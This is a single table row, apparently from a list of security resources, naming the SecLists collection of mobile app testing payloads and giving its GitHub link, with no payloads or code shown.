| SecLists — mobile app testing payloads | https://github.com/danielmiessler/SecLists |
|